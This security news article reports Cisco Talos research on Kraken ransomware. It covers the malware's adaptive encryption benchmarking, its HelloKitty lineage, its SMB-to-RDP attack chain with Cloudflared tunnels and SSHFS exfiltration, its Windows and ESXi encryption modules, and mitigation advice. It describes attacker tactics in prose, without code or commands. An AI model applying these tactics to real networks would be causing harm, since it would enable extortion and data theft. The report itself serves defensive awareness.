Kraken ransomware, which targets Windows and Linux/VMware ESXi systems, is actively using a system benchmarking process to determine the most efficient method for encrypting data without overloading victim machines. Researchers say this capability represents an advanced and uncommon feature among ransomware families, allowing attackers to maximize damage while reducing the likelihood of triggering alerts or system crashes.
Cisco Talos researchers first highlighted Kraken’s adaptive encryption functionality, explaining that the malware creates temporary files on each machine, encrypts them in a timed operation, and deletes them to measure system performance. The ransomware then uses these results to decide whether to perform full or partial encryption.
“This adaptive encryption technique allows Kraken to deal maximum damage efficiently, without overwhelming system resources or alerting defenders,” said Cisco Talos researchers.
Kraken emerged in early 2025 as a continuation of the HelloKitty ransomware operation, engaging in big-game hunting attacks that combine data theft with double-extortion tactics. Victims listed on Kraken’s leak sites span the United States, United Kingdom, Canada, Panama, Kuwait, and Denmark. Cisco notes multiple similarities with HelloKitty, including ransom note formatting and internal code references, indicating that Kraken represents a rebranding following the leak of HelloKitty’s source code. In addition to ransomware deployment, Kraken operators have launched a new cybercrime forum, “The Last Haven Board,” to facilitate communications among threat actors.
Kraken Attack Chain and Lateral Movement
According to Cisco, Kraken attacks often begin with the exploitation of SMB vulnerabilities on internet-facing assets, providing attackers with an initial foothold. Following initial access, intruders extract administrative credentials and use Remote Desktop Protocol (RDP) along with Cloudflared and SSHFS tools to expand their presence within the network. Cloudflared establishes reverse tunnels from compromised machines to attacker-controlled infrastructure, while SSHFS allows data exfiltration through mounted remote filesystems.
Once inside the network, Kraken operators use persistent Cloudflared tunnels and RDP connections to move laterally, targeting all reachable systems to steal valuable data and prepare for ransomware deployment. Prior to initiating encryption, Kraken removes shadow copies, clears the Recycle Bin, and stops backup services to prevent recovery.
Adaptive Encryption and System Assessment
The ransomware’s adaptive approach benchmarks each machine individually. Temporary files containing random data are created and encrypted to measure performance, allowing the malware to select full or partial encryption depending on the system’s capabilities. Cisco researchers emphasize that this method ensures that encryption proceeds efficiently while avoiding resource overload, which could alert administrators or trigger defensive measures.
“By tailoring the encryption process to the performance of each host, Kraken operators can maximize impact without detection,” Talos noted.
Windows Encryption Modules
The Windows version of Kraken includes four primary modules for targeting data:
- SQL Database Module: Detects Microsoft SQL Server instances through registry keys, locates database file directories, verifies paths, and encrypts SQL data files.
- Network Share Module: Enumerates accessible network shares via WNet APIs, excluding ADMIN$ and IPC$, and encrypts all other reachable shares.
- Local Drive Module: Scans available drive letters, targeting fixed, removable, and remote drives using multithreaded encryption for speed and efficiency.
- Hyper-V Module: Uses embedded PowerShell commands to list virtual machines, forcibly stops running VMs, and encrypts associated virtual disk files.
Linux and VMware ESXi Behavior
On Linux and VMware ESXi systems, Kraken enumerates running virtual machines, terminates them to release disk files, and applies multi-threaded encryption using the same benchmarking logic. The malware supports full or partial encryption based on the performance test, ensuring minimal disruption to system stability while maximizing damage.
After encryption, Kraken executes a self-cleaning script, bye_bye.sh, to remove logs, shell history, the ransomware binary, and the script itself. Encrypted files are appended with the .zpsc extension, and a ransom note (readme_you_ws_hacked.txt) is dropped in impacted directories. In one observed case, the ransom demand reached $1 million in Bitcoin.
Indicators of Compromise and Mitigation
Cisco researchers have published full indicators of compromise (IoCs) associated with Kraken ransomware on GitHub. Administrators are advised to look for unusual RDP activity, unexpected SSHFS or Cloudflared connections, and temporary files consistent with benchmarking behavior. Preventing exposure of SMB services, restricting RDP access, and monitoring network shares can help mitigate the risk of infection.
Kraken’s combination of adaptive encryption, multi-platform targeting, and big-game hunting makes it a particularly dangerous threat. Security teams are urged to ensure backups are up-to-date, apply endpoint protections, and monitor network traffic for anomalous activity indicative of ransomware reconnaissance or lateral movement.
